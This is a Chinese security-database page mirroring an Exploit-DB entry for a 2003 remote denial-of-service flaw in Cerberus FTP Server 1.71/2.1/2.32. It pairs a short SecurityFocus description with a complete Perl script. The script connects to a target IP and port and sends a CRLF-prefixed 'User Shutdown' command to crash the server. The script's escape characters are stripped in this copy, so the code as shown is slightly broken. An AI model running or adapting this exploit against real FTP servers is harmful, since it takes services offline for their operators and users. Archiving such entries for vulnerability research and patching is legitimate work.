Cerberus FTPServer 1.71/2.1/2.32 – Remote Denial of Service

Cerberus FTPServer 1.71/2.1/2.32 – Remote Denial of Service

漏洞ID 1054110 漏洞类型
发布时间 2003-08-20 更新时间 2003-08-20
图片[1]-Cerberus FTPServer 1.71/2.1/2.32 – Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-Cerberus FTPServer 1.71/2.1/2.32 – Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23042
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8452/info

It has been reported that some versions of Cerberus FTP Server may be prone to remote denial of service attacks. The problem is said to occur when the order of a carriage return and line feed are prefixed to a specific command, rather then appended. When this data is interpreted by the FTP server, the application supposedly crashes. The precise technical details regarding where the issue lies and why it occurs are currently unknown. This BID will be updated as further information becomes available. 

  print "Exploit for FTP-Servern";
  print "   by The real Remotern";
  my $usage = "nftpcrash <IP> <Port>n";
  die "$usage" unless $ARGV[0] && $ARGV[1];
  use Socket;
  my $remote = $ARGV[0];
  my $port = $ARGV[1];
  my $iaddr = inet_aton($remote);
  my $proto = getprotobyname("tcp");
  my $paddr = sockaddr_in($port, $iaddr);
  socket(SOCK, PF_INET, SOCK_STREAM, $proto);
  connect(SOCK, $paddr) or die "Can't connect to " . $remote;
  print "Sending exploitn";
  $msg = "x0dx0a";
  $msg = $msg . "User Shutdown";
  send(SOCK,$msg, 0) or die "Can't send Exploit";
  sleep(1);
  print "Server Crashed!";
  sleep(1);
  exit;

相关推荐: Netscape core file Vulnerability

Netscape core file Vulnerability 漏洞ID 1104823 漏洞类型 Design Error 发布时间 1999-03-04 更新时间 1999-03-04 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享